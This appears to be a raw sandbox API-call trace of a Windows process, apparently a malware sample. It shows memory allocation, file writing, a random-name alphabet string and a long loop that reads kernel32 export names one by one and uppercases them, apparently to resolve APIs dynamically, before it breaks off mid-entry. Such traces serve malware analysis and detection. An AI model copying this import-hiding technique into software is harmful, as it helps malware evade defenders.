returned 1 [0081.100] WriteFile (in: hFile=0x460, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0081.101] CloseHandle (hObject=0x0) returned 0 [0081.101] CloseHandle (hObject=0x460) returned 1 [0081.101] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.102] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.102] GetTickCount () returned 0x114cc26 [0081.102] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.102] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0081.102] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0081.102] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.103] lstrlenA (lpString="kernel32.dll") returned 12 [0081.103] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0081.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0081.103] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0081.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0081.103] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0081.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0081.103] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0081.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0081.103] lstrlenA (lpString="ADDATOMA") returned 8 [0081.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0081.103] lstrlenA (lpString="ADDATOMW") returned 8 [0081.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0081.103] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0081.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0081.103] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0081.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0081.103] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0081.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0081.103] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0081.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0081.103] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0081.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0081.103] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0081.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0081.103] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0081.104] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0081.104] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0081.104] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0081.104] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0081.104] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0081.104] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0081.104] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0081.104] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0081.104] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0081.104] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0081.104] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0081.104] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0081.104] lstrlenA (lpString="BACKUPREAD") returned 10 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0081.104] lstrlenA (lpString="BACKUPSEEK") returned 10 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0081.104] lstrlenA (lpString="BACKUPWRITE") returned 11 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0081.104] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0081.104] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0081.104] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0081.104] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0081.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0081.104] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0081.105] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0081.105] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0081.105] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0081.105] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0081.105] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0081.105] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0081.105] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0081.105] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0081.105] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0081.105] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0081.105] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0081.105] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0081.105] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0081.105] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0081.105] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0081.105] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0081.105] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0081.105] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0081.105] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0081.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0081.106] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0081.106] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0081.106] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0081.106] lstrlenA (lpString="BEEP") returned 4 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0081.106] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0081.106] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0081.106] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0081.106] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0081.106] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0081.106] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0081.106] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0081.106] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0081.106] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0081.106] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0081.106] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0081.106] lstrlenA (lpString="CANCELIO") returned 8 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0081.106] lstrlenA (lpString="CANCELIOEX") returned 10 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0081.106] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0081.106] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0081.106] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0081.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0081.107] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0081.107] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0081.107] lstrlenA (lpString="CHECKELEVATION") returned 14 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0081.107] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0081.107] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0081.107] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0081.107] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0081.107] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0081.107] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0081.107] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0081.107] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0081.107] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0081.107] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0081.107] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0081.107] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0081.107] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0081.107] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0081.107] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0081.107] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0081.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0081.107] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0081.108] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0081.108] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0081.108] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0081.108] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0081.108] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0081.108] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0081.108] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0081.108] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0081.108] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0081.108] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0081.108] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0081.108] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0081.108] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0081.108] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0081.108] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0081.108] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0081.108] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0081.108] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0081.108] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0081.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0081.109] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0081.109] lstrlenA (lpString="COPYCONTEXT") returned 11 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0081.109] lstrlenA (lpString="COPYFILEA") returned 9 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0081.109] lstrlenA (lpString="COPYFILEEXA") returned 11 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0081.109] lstrlenA (lpString="COPYFILEEXW") returned 11 [0081.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0081.109] lstrlenA 